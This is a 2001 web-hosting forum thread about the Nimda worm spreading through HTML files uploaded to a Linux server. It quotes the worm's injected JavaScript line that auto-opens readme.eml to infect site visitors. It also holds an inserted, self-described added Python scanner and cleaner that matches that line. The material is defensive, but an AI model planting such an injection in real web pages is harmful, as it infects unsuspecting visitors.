Web Hosting Talk

Nimda spreading through a site on a linux server?!


jucebro
10-30-2001, 02:28 PM
Has anyone else ever seen this? We have a site on a Cobalt Raq that looks like it was uploaded by a Windows user who was/is infected with the Nimda virus. I'm not sure what HTML editor they are using but here is what it looks like the virus did.

1) It added this line of code to the bottom of every .html file:

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

2) It uploaded the readme.eml to the site's DocumentRoot.

Then you go to the site, and the virus tries to spread just like it does on infected Windows servers.

Norton caught it and labeled it:

"W32.Nimda.A@mm(html) virus"


The site has a lot of Flash and JavaScript.

I guess my question is, is this something new? Is the virus actually aiming towards the HTML editor programs now also?

I know the actual server is not going to be harmed, so please no "Don't worry about it, Linux is not affected..." responses :D

RackMy.com
10-30-2001, 02:53 PM
This is a known issue with Nimda. Once a server gets infected (or infected files get uploaded to a Non-Windows system), it tries to infect web visitors by running that email which contains the virus.

Your best bet is to find "readme.eml" on the server and delete that file, then inform the customer of the "NO NO" they have done :)

Hope that helps!
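For admins who want to check a DocumentRoot for the two artifacts this thread describes (the appended window.open("readme.eml") line and the dropped readme.eml file), here is a small scanner and cleaner. It is an added example, not code from any poster, and it builds its own constructed demo directory with an inert stand-in for readme.eml so it can run offline.

```python
import os
import re
import tempfile

# Line Nimda appends to each .html file (as quoted in the post); args may vary.
INJECTED_RE = re.compile(
    r'<html><script language="JavaScript">window\.open\("readme\.eml"[^<]*'
    r'</script></html>\s*', re.IGNORECASE)
DROPPED_NAME = "readme.eml"  # the mail-format payload found in DocumentRoot


def scan_docroot(root):
    """Walk a DocumentRoot; return infected HTML files and dropped payloads."""
    findings = {"injected": [], "dropped": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() == DROPPED_NAME:
                findings["dropped"].append(path)
            elif name.lower().endswith((".html", ".htm")):
                with open(path, encoding="latin-1") as fh:
                    if INJECTED_RE.search(fh.read()):
                        findings["injected"].append(path)
    return findings


def clean_html(path):
    """Strip the injected script from one HTML file; True if it was changed."""
    with open(path, encoding="latin-1") as fh:
        original = fh.read()
    cleaned = INJECTED_RE.sub("", original)
    if cleaned == original:
        return False
    with open(path, "w", encoding="latin-1") as fh:
        fh.write(cleaned)
    return True


def build_sample_docroot():
    """Constructed demo data: one infected page, one clean page, a dummy .eml."""
    root = tempfile.mkdtemp(prefix="nimda-demo-")
    os.mkdir(os.path.join(root, "sub"))
    files = {
        "index.html": '<html><body>Welcome</body></html>\n<html><script '
                      'language="JavaScript">window.open("readme.eml", null, '
                      '"resizable=no,top=6000,left=6000")</script></html>\n',
        os.path.join("sub", "about.html"): "<html><body>About us</body></html>\n",
        "readme.eml": "X-Constructed: placeholder, not a real payload\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return root
```

Run scan_docroot() on the real DocumentRoot first and review the list before calling clean_html() on each hit; the dropped readme.eml should simply be deleted, as suggested above.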

spock
10-30-2001, 05:21 PM
Talk to the person responsible for the content (and please tell us what you find out).

I don't know much about this aspect of Nimda, but my guess is that he/she is running a local web server (IIS or PWS) on his web development workstation, and that was how the HTML files got "infected".

jucebro
10-30-2001, 06:09 PM
I'm going to contact the site's webmaster and see what I can find out, then post it here. The main thing that gets me is how the readme.eml made it to the server and why only 13 of the 20+ .html files that were uploaded at that time had the JavaScript call. The webmaster could have just uploaded all the files from a certain directory and accidentally uploaded the .eml but I'm gonna try to find out for sure.

Thanks